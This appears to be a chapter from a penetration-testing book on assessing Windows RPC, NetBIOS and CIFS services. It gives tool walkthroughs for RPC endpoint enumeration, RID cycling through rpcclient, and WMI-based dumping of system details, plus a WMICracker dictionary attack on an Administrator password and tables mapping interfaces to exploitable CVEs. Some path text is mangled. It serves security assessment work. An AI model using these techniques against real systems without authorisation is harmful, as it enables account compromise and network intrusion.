Chapter 10. Assessing Windows Networking Services

This chapter focuses on Microsoft RPC, NetBIOS, and CIFS services that are used in large internal networks to support file sharing, printing, and other functions. If these services aren’t configured or protected properly by network filtering devices, they can be used to great effect to enumerate system details and cause a complete network compromise.

Microsoft Windows Networking Services

Microsoft Windows networking services use the following ports:

loc-srv         135/tcp
loc-srv         135/udp
netbios-ns      137/udp
netbios-dgm     138/udp
netbios-ssn     139/tcp
microsoft-ds    445/tcp
microsoft-ds    445/udp

Port 135 is used for RPC client-server communication, and ports 139 and 445 are used for authentication and file sharing. UDP ports 137 and 138 are used for local NetBIOS browser, naming, and lookup functions.

SMB, CIFS, and NetBIOS

The Server Message Block (SMB) protocol facilitates resource sharing in Microsoft Windows environments. Under Windows NT, SMB is run through NetBIOS over TCP/IP, using UDP ports 137 and 138 and TCP port 139. Windows 2000 and later support Common Internet File System (CIFS), which provides full SMB access directly through TCP and UDP port 445 (as opposed to using a variety of UDP and TCP ports). Many system administrators diligently filter access to ports between 135 and 139, but have been known to neglect port 445 when protecting Windows 2000, XP, 2003, and Vista hosts.

Microsoft RPC Services

The Microsoft RPC endpoint mapper (also known as the DCE locator service) listens on both TCP and UDP port 135, and works much like the Sun RPC portmapper service found in Unix environments. Examples of Microsoft applications and services that use port 135 for endpoint mapping include Outlook, Exchange, and the Messenger Service.

Tip

Depending on the host configuration, the RPC endpoint mapper can be accessed through TCP and UDP port 135 via SMB with a null or authenticated session (through TCP ports 139 and 445), and as a web service listening on TCP port 593. For more information, see Todd Sabin’s presentation titled “Windows 2000, NULL Sessions and MSRPC.” Look for it at http://www.bindview.com/services/razor/resources/nullsess.ppt.

Assessment of RPC services includes the following:

  • Enumerating accessible RPC server interfaces and information gathering

  • Identifying vulnerable RPC server interfaces and components

  • Gleaning user and system details through LSA service interfaces (including SAMR and LSARPC)

  • Brute-forcing user passwords through the DCOM WMI subsystem

  • Executing commands through the Task Scheduler service

  • Starting services through the Server service

Following is a breakdown of these tasks, along with details of respective tools and techniques.

Enumerating Accessible RPC Server Interfaces

Through the RPC endpoint mapper, you can enumerate IP addresses of network interfaces (which will sometimes reveal internal network information), along with details of RPC services using dynamic high ports. The following tools can mine information from the endpoint mapper:

epdump (http://www.packetstormsecurity.org/nt/audit/epdump.zip)
rpctools (http://www.bindview.com/services/razor/utilities/windows/rpctools1.0-readme.cfm)
RpcScan (http://www.securityfriday.com/tools/rpcscan.html)

epdump

epdump is a Microsoft command-line utility found in the Microsoft Windows Resource Kit. Example 10-1 uses epdump to query the RPC endpoint mapper running on 192.168.189.1 (through TCP port 135).

Example 10-1. Using epdump to enumerate RPC interfaces
C:> epdump 192.168.189.1
binding is 'ncacn_ip_tcp:192.168.189.1'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
  binding 00000000-000000000000@ncadg_ip_udp:192.168.0.1[1028]
  annot 'Messenger Service'
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
  binding 00000000-000000000000@ncalrpc:[LRPC00000284.00000001]
  annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
  binding 00000000-000000000000@ncacn_ip_tcp:62.232.8.1[1025]
  annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
  binding 00000000-000000000000@ncacn_ip_tcp:192.168.170.1[1025]
  annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
  binding 00000000-000000000000@ncacn_ip_tcp:192.168.189.1[1025]
  annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
  binding 00000000-000000000000@ncacn_ip_tcp:192.168.0.1[1025]
  annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
  binding 00000000-000000000000@ncalrpc:[LRPC00000284.00000001]
  annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
  binding 00000000-000000000000@ncacn_ip_tcp:62.232.8.1[1025]
  annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
  binding 00000000-000000000000@ncacn_ip_tcp:192.168.170.1[1025]
  annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
  binding 00000000-000000000000@ncacn_ip_tcp:192.168.189.1[1025]
  annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
  binding 00000000-000000000000@ncacn_ip_tcp:192.168.0.1[1025]
  annot ''
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
  binding 00000000-000000000000@ncalrpc:[ntsvcs]
  annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
  binding 00000000-000000000000@ncacn_np:\\WEBSERV[\PIPE\ntsvcs]
  annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
  binding 00000000-000000000000@ncacn_np:\\WEBSERV[\PIPE\scerpc]
  annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
  binding 00000000-000000000000@ncalrpc:[DNSResolver]
  annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
  binding 00000000-000000000000@ncadg_ip_udp:62.232.8.1[1028]
  annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
  binding 00000000-000000000000@ncadg_ip_udp:192.168.170.1[1028]
  annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
  binding 00000000-000000000000@ncadg_ip_udp:192.168.189.1[1028]
  annot 'Messenger Service'
no more entries

The responses to this query show that the NetBIOS name of the host is WEBSERV, and there are four network interfaces with the following IP addresses:

62.232.8.1
192.168.0.1
192.168.170.1
192.168.189.1

Analysis of the RPC services that are running reveals that the Messenger Service is accessible through UDP port 1028, along with two named pipes: PIPE tsvcs and PIPEscerpc. Named pipes are accessible through SMB upon authenticating with the NetBIOS session or CIFS services.

Servers running Microsoft Exchange return many details of subsystems that are run as RPC services, and so hundreds of results are returned when using tools such as epdump and rpcdump. The useful information includes details of internal network interfaces and RPC services running on high dynamic ports, which you can use to clarify port scan results.

Many of the RPC services listed through epdump don’t have a plaintext annotation (as the Messenger service does in Example 10-1). An example of an accessible RPC service listed without annotation is as follows:

   annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
   binding 00000000-000000000000@ncacn_ip_tcp:192.168.189.1[1025]

From this information you can see that this is an RPC endpoint accessible through TCP port 1025 on 192.168.189.1, but there is only a 128-bit hex string to identify the service. This string is known as the interface ID (IFID) value.

rpctools (rpcdump and ifids)

Todd Sabin wrote two Windows utilities (rpcdump and ifids), used to query the RPC endpoint mapper using specific protocol sequences and to query specific RPC endpoints directly. The rpcdump tool can enumerate RPC service information through various protocol sequences. Its usage is as follows:

            rpcdump [-v] [-p protseq] target

One of four protocol sequences can be used to access the RPC endpoint mapper, as follows:

ncacn_np (pipeepmapper named pipe through SMB)
ncacn_ip_tcp (direct access to TCP port 135)
ncadg_ip_udp (direct access to UDP port 135)
ncacn_http (RPC over HTTP on TCP port 80, 593, or others)

The -v option enables verbosity so that rpcdump will enumerate all registered RPC interfaces. The -p option allows you to specify a particular protocol sequence to use for talking to the endpoint mapper. If none is specified, rpcdump tries all four protocol sequences.

rpcdump can be run much like epdump from the command line to dump details of network interfaces, IP addresses, and RPC servers. Example 10-2 shows rpcdump running to list all registered RPC endpoints through TCP port 135.

Example 10-2. Using rpcdump to enumerate RPC interfaces
D:
pctools> rpcdump 192.168.189.1
IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:192.168.189.1[1028]

IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncalrpc:[LRPC00000290.00000001]

IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncacn_ip_tcp:192.168.0.1[1025]

Using the verbose flag, you can walk and enumerate all IFID values for each registered endpoint. First, port 135 is queried, followed by each registered endpoint (UDP port 1028, TCP port 1025, etc.). Example 10-3 shows rpcdump used in this way to fully list all registered RPC endpoints and interfaces.

Example 10-3. Fully listing all registered RPC endpoints and interfaces
D:
pctools> rpcdump -v 192.168.189.1
IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:192.168.189.1[1028]
RpcMgmtInqIfIds succeeded
Interfaces: 16
  367abb81-9844-35f1-ad32-98f038001003 v2.0
  93149ca2-973b-11d1-8c39-00c04fb984f9 v0.0
  82273fdc-e32a-18c3-3f78-827929dc23ea v0.0
  65a93890-fab9-43a3-b2a5-1e330ac28f11 v2.0
  8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0
  6bffd098-a112-3610-9833-46c3f87e345a v1.0
  8d0ffe72-d252-11d0-bf8f-00c04fd9126b v1.0
  c9378ff1-16f7-11d0-a0b2-00aa0061426a v1.0
  0d72a7d4-6148-11d1-b4aa-00c04fb66ea0 v1.0
  4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
  300f3532-38cc-11d0-a3f0-0020af6b0add v1.2
  6bffd098-a112-3610-9833-012892020162 v0.0
  17fdd703-1827-4e34-79d4-24a55c53bb37 v1.0
  5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
  3ba0ffc0-93fc-11d0-a4ec-00a0c9062910 v1.0
  8c7daf44-b6dc-11d1-9a4c-0020af6e7c57 v1.0

IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncalrpc:[LRPC00000290.00000001]

IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncacn_ip_tcp:192.168.0.1[1025]
RpcMgmtInqIfIds succeeded
Interfaces: 2
  1ff70682-0a51-30e8-076d-740be8cee98b v1.0
  378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0

If you can’t connect to the portmapper through TCP port 135, use UDP port 135 to enumerate registered RPC endpoints with the -p ncadg_ip_udp option, shown in Example 10-4.

Example 10-4. Listing registered RPC endpoints through UDP port 135
D:
pctools> rpcdump -p ncadg_ip_udp 192.168.189.1
IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:192.168.189.1[1028]

IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncalrpc:[LRPC00000290.00000001]

IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncacn_ip_tcp:192.168.0.1[1025]

The ifids utility queries specific RPC endpoints (such as UDP 1029 or TCP 1025) to identify accessible services. A practical application of the ifids utility is to enumerate RPC services running on high ports when the RPC portmapper service isn’t accessible.

The ifids usage is:

            ifids [-p protseq] [-e endpoint]target

The -p option specifies which protocol sequence to use when talking to the server, and the -e option specifies which port to connect to. In Example 10-5, I use ifids to connect to TCP port 1025 and list the accessible interfaces.

Example 10-5. Enumerating interface information using ifids
D:
pctools> ifids -p ncacn_ip_tcp -e 1025 192.168.189.1
Interfaces: 2
  1ff70682-0a51-30e8-076d-740be8cee98b v1.0
  378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0

By referring to the list of known IFID values, you can see that these two interfaces are Microsoft Task Scheduler (mstask.exe) listeners. Example 10-6 shows how to use the ifids tool to enumerate the IFID values of RPC services accessible through UDP port 1028.

Example 10-6. Enumerating interfaces accessible through UDP port 1028
D:
pctools> ifids -p ncadg_ip_udp -e 1028 192.168.189.1
Interfaces: 16
  367abb81-9844-35f1-ad32-98f038001003 v2.0
  93149ca2-973b-11d1-8c39-00c04fb984f9 v0.0
  82273fdc-e32a-18c3-3f78-827929dc23ea v0.0
  65a93890-fab9-43a3-b2a5-1e330ac28f11 v2.0
  8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0
  6bffd098-a112-3610-9833-46c3f87e345a v1.0
  8d0ffe72-d252-11d0-bf8f-00c04fd9126b v1.0
  c9378ff1-16f7-11d0-a0b2-00aa0061426a v1.0
  0d72a7d4-6148-11d1-b4aa-00c04fb66ea0 v1.0
  4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
  300f3532-38cc-11d0-a3f0-0020af6b0add v1.2
  6bffd098-a112-3610-9833-012892020162 v0.0
  17fdd703-1827-4e34-79d4-24a55c53bb37 v1.0
  5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
  3ba0ffc0-93fc-11d0-a4ec-00a0c9062910 v1.0
  8c7daf44-b6dc-11d1-9a4c-0020af6e7c57 v1.0

RpcScan

Urity (http://www.securityfriday.com) wrote a graphical Windows version of the rpcdump tool called RpcScan. In the same way rpcdump -v works, RpcScan queries each registered RPC endpoint and enumerates all the IFID values. Urity spent time researching IFID values and idiosyncrasies, referencing them in the RpcScan output. Figure 10-1 shows the tool in use against 192.168.189.1.

RpcScan graphically displays IFID values and references
Figure 10-1. RpcScan graphically displays IFID values and references

Identifying Vulnerable RPC Server Interfaces

Upon enumerating accessible RPC endpoints and associated IFID values, it is necessary to cross-reference them with known Microsoft RPC service issues, and further test them using exploitation frameworks and similar tools. Table 10-1 lists IFID values that have known remotely exploitable issues, as found in MITRE CVE. Table 10-2 lists other useful IFID values that can be used to enumerate users, perform password grinding, and execute commands.

Table 10-1. IFID values with known remotely exploitable issues

IFID

Service details

CVE reference(s)

12345678-1234-abcd-ef00-0123456789ab

Print spooler service

CVE-2005-1984

17fdd703-1827-4e34-79d4-24a55c53bb37

Messenger service

CVE-2003-0717

2f5f3220-c126-1076-b549-074d078619da

NetDDE service

CVE-2004-0206

2f5f6520-ca46-1067-b319-00dd010662da

Telephony service

CVE-2005-0058

342cfd40-3c6c-11ce-a893-08002b2e9c6d

License and Logging Service (LLSRV) interface

CVE-2005-0050

3919286a-b10c-11d0-9ba8-00c04fd92ef5

LSASS interface

CVE-2003-0533

4b324fc8-1670-01d3-1278-5a47bf6ee188

Server service

CVE-2005-0051

CVE-2006-3439

4d9f4ab8-7d1c-11cf-861e-0020af6e7c57

DCOM interface

CVE-2003-0352

CVE-2003-0528

CVE-2003-0715

CVE-2004-0124

50abc2a4-574d-40b3-9d66-ee4fd5fba076

DNS server service

CVE-2007-1748

5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc

Messenger service

CVE-2003-0717

6bffd098-a112-3610-9833-46c3f87e345a

Workstation service

CVE-2003-0812

CVE-2006-4691

8d9f4e40-a03d-11ce-8f69-08003e30051b

Plug and Play service

CVE-2005-1983

CVE-2005-2120

8f09f000-b7ed-11ce-bbd2-00001a181cad

Remote Access Service Manager (RASMAN) interface

CVE-2006-2370

CVE-2006-2371

c8cb7687-e6d3-11d2-a958-00c04f682e16

WebDAV client service

CVE-2006-0013

d6d70ef0-0e3b-11cb-acc3-08002b1d29c3

RPC locator service

CVE-2003-0003

e67ab081-9844-3521-9d32-834f038001c0

Client service for NetWare

CVE-2005-1985

CVE-2006-4688

e1af8308-5d1f-11c9-91a4-08002b14a0fa

RPC endpoint mapper

CVE-2002-1561

fdb3a030-065f-11d1-bb9b-00a024ea5525

Message Queuing (MQ) and MSDTC services

CVE-2005-0059

CVE-2005-2119

CVE-2006-0034

CVE-2006-1184

Table 10-2. Other useful MSRPC interfaces

IFID

Service comments

12345778-1234-abcd-ef00-0123456789ab

LSA interface, used to enumerate users

12345778-1234-abcd-ef00-0123456789ac

LSA SAMR interface, used to access the public components of the SAM database, including usernames

1ff70682-0a51-30e8-076d-740be8cee98b

Task scheduler, used to remotely execute commands (with a valid username/password)

338cd001-2244-31f1-aaaa-900038001003

Remote registry service, used to remotely access and modify the system registry (depending on permissions and access rights)

4b324fc8-1670-01d3-1278-5a47bf6ee188

Server service, used to remotely start and stop services on the host

4d9f4ab8-7d1c-11cf-861e-0020af6e7c57

DCOM WMI interface, used for brute-force password grinding and information gathering

Tip

If administrative credentials are known (such as the Administrator account password), the LSA and SAMR interfaces can be used to add users and elevate rights and privileges accordingly. These commands and issues are discussed in the following sections.

I only cover Microsoft RPC endpoints with significant security implications here. Jean-Baptiste Marchand has assembled an excellent series of documents that cover Microsoft RPC interfaces and named pipe endpoints. His “Windows network services internals” page should be reviewed for current up-to-date details of Microsoft RPC issues, accessible at http://www.hsc.fr/ressources/articles/win_net_srv/.

Microsoft RPC interface process manipulation bugs

A number of remotely exploitable RPC interface issues have been publicized over recent years, as listed in Table 10-3.

Table 10-3. Remotely exploitable MSRPC vulnerabilities

CVE reference(s)

Advisory

Notes

Exploit framework support

IMPACT

CANVAS

MSF

   

CVE-2007-1748

MS07-029

DNS server service interface zone name overflow

CVE-2006-4691

MS06-070

Workstation service overflow

 

CVE-2006-4688

MS06-066

Microsoft Netware client service overflow

CVE-2006-3439

MS06-040

Server service overflow

CVE-2006-2371

MS06-025

Remote Access Service Manager (RASMAN) registry corruption vulnerability

 

CVE-2006-2370

MS06-025

Routing and Remote Access Service (RRAS) memory corruption vulnerability

CVE-2005-1985

MS05-046

Microsoft Netware client service overflow

 

CVE-2005-1984

MS05-043

Print spooler service overflow

 

CVE-2005-1983

MS05-039

Plug and Play service overflow

CVE-2005-0059

MS05-017

Message Queuing (MSMQ) RPC overflow

CVE-2005-0058

MS05-040

Telephony service overflow

 

CVE-2005-0050

MS05-010

License and Logging Service (LLSSRV) overflow

 

CVE-2004-0206

MS04-031

NetDDE service overflow

CVE-2003-0818

MS04-007

Local Security Authority Subsystem Service (LSASS) ASN.1 overflow

CVE-2003-0812

MS03-049

Workstation service overflow

CVE-2003-0717

MS03-043

Messenger service overflow

 

CVE-2003-0715 and CVE-2003-0528

MS03-039

DCOM interface heap overflows

  

CVE-2003-0533

MS04-011

Local Security Authority Subsystem Service (LSASS) overflow

CVE-2003-0352

MS03-026

DCOM interface stack overflow

CVE-2003-0003

MS03-001

RPC locator service overflow

 

Tip

A number of these issues, including CVE-2006-3439 (Server service overflow) and CVE-2003-0533 (LSASS overflow) are also exploitable through named pipes, depending on configuration and network filtering, accessible via NetBIOS (TCP port 139) and CIFS (TCP port 445). CVE-2003-0818 is exploitable through any mechanism supporting NTLM authentication, including NetBIOS (SMB), HTTP, and SMTP.

Gleaning User Details via SAMR and LSARPC Interfaces

A number of RPC queries can be issued to accessible LSARPC and SAMR RPC service endpoints (running over TCP, UDP, HTTP, or named pipes). Named pipes access is provided across SMB sessions, accessible via the NetBIOS session service (TCP port 139), and CIFS service (TCP port 445).

walksam

The walksam utility (found in Todd Sabin’s rpctools package) queries the SAMR named pipe interface (pipesamr) to glean user information. Example 10-7 shows walksam being used across a local Windows network to walk the SAMR interface of 192.168.1.1.

Example 10-7. Using walksam over SMB and named pipes
D:
pctools> walksam 192.168.1.1
rid 500: user Administrator
Userid: Administrator
Description: Built-in account for administering the computer/domain
Last Logon:  8/12/2003 19:16:44.375
Last Logoff:  never
Last Passwd Change:  8/13/2002 18:43:52.468
Acct. Expires:  never
Allowed Passwd Change:  8/13/2002 18:43:52.468
Rid: 500
Primary Group Rid: 513
Flags: 0x210
Fields Present: 0xffffff
Bad Password Count: 0
Num Logons: 101

rid 501: user Guest
Userid: Guest
Description: Built-in account for guest access to the computer/domain
Last Logon:  never
Last Logoff:  never
Last Passwd Change:  never
Acct. Expires:  never
Allowed Passwd Change:  never
Rid: 501
Primary Group Rid: 513
Flags: 0x215
Fields Present: 0xffffff
Bad Password Count: 0
Num Logons: 0

The walksam utility also supports additional protocol sequences used by Windows 2000 Domain Controllers. The SAMR interface must first be found (IFID 12345778-1234-abcd-ef00-0123456789ac) using rpcdump or a similar tool to list all the registered endpoints; it’s then accessed using walksam with the correct protocol sequence (over named pipes, TCP, UDP, or HTTP).

Tip

Windows enumeration tools, such as walksam, that use RID cycling to list users (through looking up RID 500, 501, 502, etc.) identify the administrator account, even if it has been renamed.

Example 10-8 shows walksam in use against a Windows 2000 domain controller running a SAMR interface through the ncacn_ip_tcp endpoint at TCP port 1028.

Example 10-8. Using walksam to list user details through TCP port 1028
D:
pctools> walksam -p ncacn_ip_tcp -e 1028 192.168.1.10
rid 500: user Administrator
Userid: Administrator
Description: Built-in account for administering the computer/domain
Last Logon:  8/6/2003 11:42:12.725
Last Logoff:  never
Last Passwd Change:  2/11/2003 09:12:50.002
Acct. Expires:  never
Allowed Passwd Change:  2/11/2003 09:12:50.002
Rid: 500
Primary Group Rid: 513
Flags: 0x210
Fields Present: 0xffffff
Bad Password Count: 0
Num Logons: 101

Accessing RPC interfaces over SMB and named pipes using rpcclient

rpcclient (part of the Unix Samba package from http://www.samba.org) can be used to interact with RPC service endpoints across SMB and named pipes (accessible through the NetBIOS session and CIFS services). The tool has an extraordinary number of features and usage options—far too many to list here. Before using the rpcclient tool, I recommend that you review http://www.samba-tng.org/docs/tng/htmldocs/rpcclient.8.html. Table 10-4 lists the useful SAMR and LSARPC interface commands that can be issued through the rpcclient utility upon establishing an SMB session.

By default, Windows systems and Windows 2003 domain controllers allow anonymous (null session) access to SMB, so these interfaces can be queried in this way. If null session access to SMB is not permitted, a valid username and password must be provided to access the LSARPC and SAMR interfaces.

Table 10-4. Useful rpcclient commands

Command

Interface

Description

queryuser

SAMR

Retrieve user information

querygroup

SAMR

Retrieve group information

querydominfo

SAMR

Retrieve domain information

enumdomusers

SAMR

Enumerate domain users

enumdomgroups

SAMR

Enumerate domain groups

createdomuser

SAMR

Create a domain user

deletedomuser

SAMR

Delete a domain user

lookupnames

LSARPC

Look up usernames to SID values

lookupsids

LSARPC

Look up SIDs to usernames (RID cycling)

lsaaddacctrights

LSARPC

Add rights to a user account

lsaremoveacctrights

LSARPC

Remove rights from a user account

Example 10-9 shows rpcclient in use against a remote system at 192.168.0.25 to perform RID cycling and enumerate users through the LSARPC named pipe (pipelsarpc). In this example we first look up the full SID value of the chris account, and then increment the RID value (1001 through to 1007) to enumerate the other user accounts through the LSARPC interface.

Example 10-9. RID cycling through rpcclient and the LSARPC interface
$ rpcclient -I 192.168.0.25 -U=chris%password WEBSERV
rpcclient> lookupnames chris
chris S-1-5-21-1177238915-1563985344-1957994488-1003 (User: 1)
rpcclient> lookupsids S-1-5-21-1177238915-1563985344-1957994488-1001
S-1-5-21-1177238915-1563985344-1957994488-1001 WEBSERVIUSR_WEBSERV
rpcclient> lookupsids S-1-5-21-1177238915-1563985344-1957994488-1002
S-1-5-21-1177238915-1563985344-1957994488-1002 WEBSERVIWAM_WEBSERV
rpcclient> lookupsids S-1-5-21-1177238915-1563985344-1957994488-1003
S-1-5-21-1177238915-1563985344-1957994488-1003 WEBSERVchris
rpcclient> lookupsids S-1-5-21-1177238915-1563985344-1957994488-1004
S-1-5-21-1177238915-1563985344-1957994488-1004 WEBSERVdonald
rpcclient> lookupsids S-1-5-21-1177238915-1563985344-1957994488-1005
S-1-5-21-1177238915-1563985344-1957994488-1005 WEBSERV	est
rpcclient> lookupsids S-1-5-21-1177238915-1563985344-1957994488-1006
S-1-5-21-1177238915-1563985344-1957994488-1006 WEBSERVdaffy
rpcclient> lookupsids S-1-5-21-1177238915-1563985344-1957994488-1007
result was NT_STATUS_NONE_MAPPED
rpcclient>

Alternatively, you can use the enumdomusers command to simply list all users through a forward lookup (this technique will not work if RestrictAnonymous=1, and RID cycling must be used), as shown in Example 10-10.

Example 10-10. Enumerating users through the SAMR interface
rpcclient> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[chris] rid:[0x3eb]
user:[daffy] rid:[0x3ee]
user:[donald] rid:[0x3ec]
user:[Guest] rid:[0x1f5]
user:[IUSR_WEBSERV] rid:[0x3e9]
user:[IWAM_WEBSERV] rid:[0x3ea]
user:[test] rid:[0x3ed]
user:[TsInternetUser] rid:[0x3e8]

The rpcclient tool is extremely powerful and versatile; it allows user accounts to be created remotely and privileges to be elevated. However, this functionality requires a valid username and password combination, often necessitating the use of brute force.

SMB null sessions and hardcoded named pipes

Jean-Baptiste Marchand posted an advisory to BugTraq on July 7, 2005 (http://marc.info/?l=bugtraq&m=112076409813099&w=2), describing a flaw within Windows 2003 SP1, Windows XP SP2, Windows 2000 SP4, and Windows NT 4.0 systems, allowing for an anonymous SMB null session to be established with NetBIOS and CIFS services, which in turn can be used to anonymously access RPC server named pipe interfaces, as follows:

  • Local Security Authority (LSA) RPC server (pipelsarpc)

  • LSA Security Account Manager (SAM) RPC server (pipesamr)

  • LSA Netlogon RPC server (pipe etlogon)

  • Service Control Manager (SCM) RPC server (pipesvcctl)

  • Eventlog service RPC server (pipeeventlog)

  • Server service RPC server (pipesrvsvc)

  • Workstation service RPC server (pipewkssvc)

These service endpoints can be queried using tools such as Samba rpcclient, allowing remote unauthenticated attackers to enumerate users and groups, view running services, and view the server event logs under Windows NT 4.0 and Windows 2000 SP4 in their default configurations. Windows Server 2003 Active Directory and domain controllers are also susceptible, although Windows XP SP2 is largely shielded from these vulnerabilities.

John-Baptiste Marchand’s presentation covering null sessions and RPC named pipes is available from http://www.hsc.fr/ressources/presentations/null_sessions/. He discusses hardcoded named pipes that are present in Windows XP SP1 and earlier, and how these can be used to proxy RPC queries and commands to other RPC named pipe interfaces that run within the same service instance server-side.

Brute-Forcing Administrator Passwords

In 2002, the Chinese hacking group netXeyes developed WMICracker (http://www.netxeyes.org/wmicracker.exe). The tool accesses DCOM Windows Management Interface (WMI) components to brute-force passwords of users in the Administrators group.

Example 10-11 shows WMICracker in use against port 135 of 192.168.189.2 to brute-force the Administrator password using the dictionary file words.txt.

Example 10-11. Using WMICracker to brute-force the Administrator password
C:> WMICracker 192.168.189.1 Administrator words.txt

WMICracker 0.1, Protype for Fluxay5. by netXeyes 2002.08.29
http://www.netXeyes.com, [email protected]

Waiting For Session Start....
Testing qwerty...Access is denied.
Testing password...Access is denied.
Testing secret...Access is denied.

Administrator's Password is control

The venom utility also brute-forces user passwords across WMI. At the time of writing, venom is available at http://www.cqure.net/tools/venom-win32-1_1_5.zip.

Enumerating System Details Through WMI

WMIdump (http://www.cqure.net/wp/?page_id=28) is a Windows tool that can be used to query the WMI subsystem and dump useful internal system information. At the time of writing, the current binary is available from http://www.cqure.net/tools/wmidump-dotnet-1_3_0.zip.

In particular, WMIdump is used to enumerate the following for a given Windows host:

  • Operating system and computer details

  • System accounts and users

  • Installed hotfixes

  • Running processes

  • Running services and settings

  • Installed software and patch levels

  • Network adapters installed and associated settings

  • Serial port and modem settings

  • Logical disks

WMIdump is shown in Example 10-12 dumping system details, including user accounts, from the remote host over WMI.

Example 10-12. Using WMIdump to enumerate valid user details
C:> WMIdump -c configstandard.config -u Administrator -p control -t 192.168.189.2

WMIDump v1.3.0 by [email protected]
-----------------------------------
Dumping 192.168.189.2:Win32_Process
Dumping 192.168.189.2:Win32_LogicalDisk
Dumping 192.168.189.2:Win32_NetworkConnection
Dumping 192.168.189.2:Win32_ComputerSystem
Dumping 192.168.189.2:Win32_OperatingSystem
Dumping 192.168.189.2:Win32_Service
Dumping 192.168.189.2:Win32_SystemUsers
Dumping 192.168.189.2:Win32_ScheduledJob
Dumping 192.168.189.2:Win32_Share
Dumping 192.168.189.2:Win32_SystemAccount
Dumping 192.168.189.2:Win32_LogicalProgramGroup
Dumping 192.168.189.2:Win32_Desktop
Dumping 192.168.189.2:Win32_Environment
Dumping 192.168.189.2:Win32_SystemDriver
Dumping 192.168.189.2:Win32_NetworkClient
Dumping 192.168.189.2:Win32_NetworkProtocol
Dumping 192.168.189.2:Win32_ComputerSystemProduct
Dumping 192.168.189.2:Win32_QuickFixEngineering

C:> dir 192.168.189.2
Volume in drive C is HARDDISK
 Volume Serial Number is 846A-8EA9

 Directory of C:192.168.189.2

08/07/2007  17:52    <DIR>          .
08/07/2007  17:52    <DIR>          ..
08/07/2007  17:52             1,183 Win32_ComputerSystem.dmp
08/07/2007  17:52               196 Win32_ComputerSystemProduct.dmp
08/07/2007  17:52               912 Win32_Desktop.dmp
08/07/2007  17:52             2,747 Win32_Environment.dmp
08/07/2007  17:52               768 Win32_LogicalDisk.dmp
08/07/2007  17:52            18,387 Win32_LogicalProgramGroup.dmp
08/07/2007  17:52               717 Win32_NetworkClient.dmp
08/07/2007  17:52                 0 Win32_NetworkConnection.dmp
08/07/2007  17:52             6,655 Win32_NetworkProtocol.dmp
08/07/2007  17:52             1,573 Win32_OperatingSystem.dmp
08/07/2007  17:52            24,848 Win32_Process.dmp
08/07/2007  17:52            17,032 Win32_QuickFixEngineering.dmp
08/07/2007  17:52                 0 Win32_ScheduledJob.dmp
08/07/2007  17:52            38,241 Win32_Service.dmp
08/07/2007  17:52               274 Win32_Share.dmp
08/07/2007  17:52             2,382 Win32_SystemAccount.dmp
08/07/2007  17:52            55,184 Win32_SystemDriver.dmp
08/07/2007  17:52             1,262 Win32_SystemUsers.dmp
              18 File(s)        172,361 bytes
               2 Dir(s)     103,497,728 bytes free

C:> type 192.168.189.2Win32_SystemUsers.dmp
GroupComponent;PartComponent;
\WEBSERV
ootcimv2:Win32_ComputerSystem.Name="WEBSERV";\WEBSERV
ootcimv2:
Win32_UserAccount.Name="Administrator",Domain="OFFICE";
\WEBSERV
ootcimv2:Win32_ComputerSystem.Name="WEBSERV";\WEBSERV
ootcimv2:
Win32_UserAccount.Name="ASPNET",Domain="OFFICE";
\WEBSERV
ootcimv2:Win32_ComputerSystem.Name="WEBSERV";\WEBSERV
